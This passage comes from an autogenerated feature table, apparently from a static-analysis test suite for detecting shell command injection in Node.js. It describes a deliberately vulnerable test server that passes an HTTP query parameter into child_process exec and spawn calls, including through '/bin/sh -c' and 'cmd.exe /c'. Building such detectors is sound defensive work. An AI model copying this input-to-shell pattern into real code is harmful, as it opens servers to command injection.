/bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:28 | gid: cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:28 | gid: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:28 | gid: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:28 | gid: cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:28 | gid: cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd | InputAccessPathFromCallee | 1.gid | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd | assignedToPropName | gid | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:9:34:10 | sh | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:9:34:10 | sh | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:9:34:10 | sh | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:9:34:10 | sh | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:9:34:10 | sh | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:9:34:10 | sh | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:9:34:10 | sh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:9:34:10 | sh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:9:34:10 | sh | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:9:34:10 | sh | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:13:34:16 | flag | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:13:34:16 | flag | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:13:34:16 | flag | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:13:34:16 | flag | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:13:34:16 | flag | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:13:34:16 | flag | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:13:34:16 | flag | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:13:34:16 | flag | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:13:34:16 | flag | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:34:13:34:16 | flag | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:15 | process | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:15 | process | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:15 | process | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:15 | process | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:15 | process | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:24 | process.platform | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:24 | process.platform | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:24 | process.platform | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:24 | process.platform | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:24 | process.platform | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:35 | process ... 'win32' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:35 | process ... 'win32' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:35 | process ... 'win32' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:35 | process ... 'win32' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:9:35:35 | process ... 'win32' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:17:35:24 | platform | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:17:35:24 | platform | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:17:35:24 | platform | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:17:35:24 | platform | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:17:35:24 | platform | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:29:35:35 | 'win32' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:29:35:35 | 'win32' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:29:35:35 | 'win32' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:29:35:35 | 'win32' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:35:29:35:35 | 'win32' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:8 | sh | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:8 | sh | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:8 | sh | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:8 | sh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:8 | sh | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:20 | sh | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:20 | sh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:20 | sh | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:20 | sh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:20 | sh | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:20 | sh = 'cmd.exe' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:20 | sh = 'cmd.exe' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:20 | sh = 'cmd.exe' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:20 | sh = 'cmd.exe' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:20 | sh = 'cmd.exe' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:33 | sh = 'c ... = '/c' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:33 | sh = 'c ... = '/c' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:33 | sh = 'c ... = '/c' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:33 | sh = 'c ... = '/c' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:7:36:33 | sh = 'c ... = '/c' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:12:36:20 | 'cmd.exe' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:12:36:20 | 'cmd.exe' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:12:36:20 | 'cmd.exe' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:12:36:20 | 'cmd.exe' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:12:36:20 | 'cmd.exe' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:26 | flag | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:26 | flag | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:26 | flag | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:26 | flag | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:26 | flag | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:33 | flag | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:33 | flag | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:33 | flag | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:33 | flag | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:33 | flag | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:33 | flag = '/c' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:33 | flag = '/c' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:33 | flag = '/c' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 